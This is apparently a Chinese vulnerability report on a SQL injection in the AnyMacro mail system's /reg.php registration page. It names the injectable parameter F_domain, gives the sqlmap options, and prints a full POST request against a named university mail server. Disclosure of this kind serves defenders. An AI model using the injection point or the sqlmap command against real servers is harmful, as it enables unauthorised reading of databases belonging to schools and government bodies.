AnyMacro安宁邮件系统前台SQL注入漏洞可直接读库

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: AnyMacro安宁邮件系统前台注入 应该没有重复 不知道有没有两个$$ 顺便rank也多给点呗 ### 详细说明: anymacro是国内较流行的一家企业级邮箱系统,客户主要为教育/政府机构。漏洞影响范围参考以前的漏洞,就不一一贴出来了 漏洞文件: /reg.php 参数: F_domain 数据库: MYSQL sqlmap: --dbms mysql -p F_domain ### 漏洞证明: 1、 mail.imnc.edu.cn/reg.php ``` POST /reg.php HTTP/1.1 Host: mail.imnc.edu.cn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://mail.imnc.edu.cn/reg.php?F_lang= X-Forwarded-For: 8.8.8.8 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 209 F_lang=zh_gb&F_chkcode_enc=2Rzr9vXm7O8%3D&F_regpass=bma&F_name=bma&F_email=bma&F_domain=imnc.edu.cn&F_password=bma123&F_password2=bma123&F_chkcode=448428&p_office=111&p_phone=111&p_sex=%C4%D0&act=%D7%A2+%B2%E1 ``` [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息